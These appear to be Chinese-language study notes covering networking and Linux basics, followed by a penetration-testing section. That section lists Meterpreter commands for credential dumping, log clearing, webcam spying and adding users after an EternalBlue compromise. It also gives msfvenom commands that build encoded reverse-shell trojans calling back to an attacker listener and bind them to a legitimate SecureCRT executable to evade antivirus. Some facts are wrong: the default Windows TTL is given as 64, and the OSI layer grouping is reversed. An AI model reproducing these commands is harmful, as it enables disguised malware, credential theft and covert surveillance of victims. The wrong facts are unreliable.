1,网络
设备 链路
设备:网络设备(对外提供网络服务) 终端设备(使用网络服务)
路由器 交换机 防火墙 pc机,服务器
osi参考模型
开放系统互联的参考模型
iso:国际标准化组织
1.物理层:传输bit
2.数据链层
3.网络层
4.传输层
5.会话层
6.表示层
7.应用层
1-3 用户运用 4-7数据传输
物理层:提供传输bit的介质,定义数据传输方式
bit位 Byte字节 B=8b
1.双绞线(网线),抗干扰
1五类线 100Mb/S,超五类,六类:1000Mb/S
T568A:绿白,绿,橙白,蓝,蓝白,橙,棕白,棕
T568B:橙白,橙,绿白,蓝,蓝白,绿,棕白,棕
2.信号传输方式
(1)单工模式:一方发送数据,另一方接受数据(空调,遥控器)
(2)半双工模式:在同一模式内,一方发送数据,另一方接受数据(对讲机)
(3)全双工模式:双方可以同时发送和接受数据
2.数据链层(将数据变成数据帧传送到对端):物理编址,mac地址,总长48bit,12位十六进制数表示,mac地址全球唯一,终身不可变
前24bit表示oui(厂商),后24bit厂商自定义
每个网卡都有一个mac地址,ipcanfig/all
传输的是数据帧
DNS:域名解析
将域名解析成ip地址
需要依赖dns服务器工作的
公用dns:114.114.114.114
*****ping:表示探测的目标是否可达
reply from:从目标收到回复
request time out:超时,数据包发送,对方不回复
Unreachable:可达,数据包不可以发送到终端
CDN(旁站)
3.网络层:1.提供逻辑编制(ip地址), 总成32bit,每8bit转换成十进制,中间用“”.“”来连接(点分十进制)
ip地址根据首字节判断类别
A:1-126 B128-191 C192-223 D224-239 E:240-255
127被保留,作为本地环回地址使用,用于测试本地地址网卡驱动程序是否正常工作
*****tracert:探测目标的路径
TTL:Time to live,数据包每经过一台设备,TTL就会-1,window的ttl初始默认为64
子网掩码
vmware1:仅主机模式,则只可以访问宿主机,不可以访问外部网络
vmware8:nat模式,当虚拟机网卡调整vmnet8后,可以借助宿主机网络访问外部网络
操作系统
wondows:适合新手,更面向个人用户 缺陷:1蓝屏,2不可以长时间待机
linux:开源且稳定;
Mac OS:苹果
shell(人机交互的接口)
1GUI(图形化界面)
2CLI(命令行接口):用这个人多
──(root㉿kali)-[~]
└─#
root:用户名
k:分隔符无意义
kali:主机名
后面工作路径
基础命令:
1.whoami:查看用户名
2.pwd:打印工作路径
3.切换用户:
在linux有且只有两种用户
(1):普通用户
(2):超级管理员:root,尽量避免root来操作系统 (rm -rf /*删除所有)
su - 用户名(完全)
su 用户名(只是命令)
root 切其他直接 ,其他切换到root要密码
不要频繁使用su -不断产生子资源,占用资源
**history:之前所有命令
exit:退出子进程
ctrl+d :退出当前的shell对话
cd命令(change directory):切换更改路径
windows系统目录以盘开头
linux 系统目录以/开头
wireshark:一款网络工具,抓捕数据表
永恒之蓝:shell进入对方cmd
cmd: md 创造文件夹
net user 名字 /add :创造新用户del删除
获取密码:load kiwi creds_all 2.hashdump(密文)
clearev:清空日志
screenshot:截图 screenshare视频看 webcam_stream webcam_snap
shutdown -a:取消 -r:重启 -s:关机
netstat -n:查看其他与自己电脑连接的ip
chcp 65001:消除乱码
上传 upload /目录 C://
下载 download c://名字 /目录
run post/manage/enable_rdp username=123 password 123
木马生成及其利用:
1关闭杀软
2在kali终端里用msf生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.113.128 -f exe -o text.exe
-p 指定payload类型,此处指定windows/meterpreterreverse_tcp
-f format 指的是输出格式类型
-o 输出木马文件名,此处payload.exe
2 监听
use. exploit/multi/handler
pwd
ls
cat+文件名可以查看文件内容
edit 编辑
del 删除
run post/windows/manage/migrate 躲避杀软
atp install -y golang
binding权限
ls -s内容及其属性
chmod +x bindbing
./binding 查看binding使用方法
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.113.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe
./binding msf.exe secure-CRT.exe secure-CRT.ico